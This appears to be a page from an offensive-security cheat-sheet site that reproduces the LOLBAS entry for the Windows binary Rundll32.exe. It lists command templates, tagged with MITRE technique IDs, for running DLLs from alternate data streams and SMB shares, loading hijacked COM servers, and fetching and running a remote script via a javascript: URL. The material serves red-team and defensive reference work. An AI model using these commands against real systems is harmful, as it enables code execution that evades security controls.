🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Rundll32.exe

Rundll32.exe

Used by Windows to execute dll files

ADS

Execute code from alternate data stream

rundll32 "{PATH}:ADSDLL.dll",DllMain

Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). — MITRE: T1564.004 — Privileges: User

Execute

Execute DLL file

rundll32.exe {PATH},EntryPoint

First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute. — MITRE: T1218.011 — Privileges: User

Execute DLL from SMB share.

rundll32.exe {PATH_SMB:.dll},EntryPoint

Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute. — MITRE: T1218.011 — Privileges: User

Execute code from Internet

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")

Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. — MITRE: T1218.011 — Privileges: User

Execute a DLL/EXE COM server payload or ScriptletURL code.

rundll32.exe -sta {CLSID}

Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. — MITRE: T1218.011 — Privileges: User